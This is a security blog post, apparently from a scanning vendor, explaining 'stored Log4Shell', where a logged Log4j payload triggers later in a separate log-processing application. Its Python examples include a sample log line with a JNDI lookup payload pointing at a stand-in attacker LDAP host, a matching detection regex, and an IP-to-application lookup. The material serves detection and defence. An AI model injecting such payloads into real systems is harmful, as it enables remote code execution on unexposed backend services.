What is Stored Log4Shell?

Note: I initially posted this article on Data Theorem’s blog.

What is “Stored Log4Shell” and how does it differ from the regular Log4Shell issue?

The following diagram describes how Data Theorem, the company where I work, detects APIs and servers vulnerable to Log4Shell:

During our analysis, we noticed that the LDAP request triggered by Log4j can reach our exploit server (step 2 in the diagram) anywhere from a few seconds after we send the payload, which is the norm, to several hours later. This LDAP request is what indicates that an application is vulnerable to Log4Shell, but why would the exploit take so long to run?

We investigated and uncovered the following scenario:

A web application receiving our Log4Shell payload is not vulnerable: it does log the payload (for example as part of the User-Agent header) to a file, but it doesn’t use a vulnerable version of the Log4j library to do so. Hence, the exploit is not triggered at that time.
Later, a second, separate application processes the log files generated by the initial web application. This second application uses a vulnerable version of the Log4j library and logs some data extracted from the initial application’s logs. This is when the exploit gets triggered, which explains why the callback can arrive hours after the payload was sent.
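
To make the two stages concrete, here is a minimal Python sketch of the data flow, not of any real application. The log line, the hostname exploit.example.com, and the helper names are all hypothetical, and the log format is assumed to be the common "combined" access-log layout. The first application only writes the payload to disk; the second extracts the User-Agent field, and that extracted value is what would end up in a vulnerable Log4j call.

```python
import re

# Hypothetical access-log line written by the first (non-vulnerable) application.
# The User-Agent field carries the payload verbatim; nothing is triggered here.
LOG_LINE = (
    '203.0.113.7 - - [10/Dec/2021:13:55:36 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://exploit.example.com/a}"'
)

# Assumed "combined" log format: the last quoted field is the User-Agent.
COMBINED = re.compile(
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Plain, unobfuscated JNDI lookup prefix.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def extract_user_agent(line):
    """Stage 2: the log-processing application pulls a field out of the log."""
    match = COMBINED.search(line)
    return match.group("user_agent") if match else None


def contains_jndi_lookup(value):
    """Flag values that would trigger a lookup if passed to a vulnerable Log4j."""
    return bool(JNDI_LOOKUP.search(value))


user_agent = extract_user_agent(LOG_LINE)
if user_agent is not None and contains_jndi_lookup(user_agent):
    print("stored payload found in log field:", user_agent)
```

The pattern above only matches the plain `${jndi:` form. Payloads obfuscated with nested lookups would slip past it, so this is an illustration of where the payload travels rather than a reliable filter.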

We’ve dubbed this a “stored” Log4Shell issue: the payload gets stored to a file, and, at a later stage, it reaches a vulnerable application which then gets exploited.

We’ve seen an example of this with S3 buckets that have S3 server access logging or CloudTrail enabled to log the HTTP requests sent to the bucket:

In one of the environments we scanned, a Java application was configured to process a bucket’s access logs every few hours.
This Java application was using a vulnerable version of the Log4j library, and was logging specific content extracted from the bucket’s logs, thereby triggering the exploit.

This increases the impact of Log4Shell, because applications that an attacker cannot reach directly from the Internet can still be compromised via a “stored” Log4Shell. It also makes it difficult to identify which specific application is vulnerable, among all the applications that might process your web logs. In this situation, the IP address that opened the connection to the LDAP server can help pinpoint the application.
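
As a rough illustration of that last step, the sketch below maps the source IP of an LDAP callback to an entry in an inventory of egress ranges. The inventory, the application names, and the function name are hypothetical, and the addresses come from documentation-only ranges. It assumes you already know which public ranges each of your applications uses for outbound traffic.

```python
import ipaddress

# Hypothetical inventory: egress CIDR range -> application that uses it.
INVENTORY = {
    "198.51.100.0/24": "web-frontend",
    "203.0.113.0/24": "log-processing-batch",
}


def identify_application(source_ip, inventory=INVENTORY):
    """Return the application whose egress range contains source_ip, or None."""
    address = ipaddress.ip_address(source_ip)
    for cidr, application in inventory.items():
        if address in ipaddress.ip_network(cidr):
            return application
    return None


# Source IP observed on the LDAP server when the callback came in (made up).
print(identify_application("203.0.113.42"))
```

If several applications share one NAT gateway or proxy, the source IP only narrows the search down to that network, and the remaining candidates still have to be checked individually.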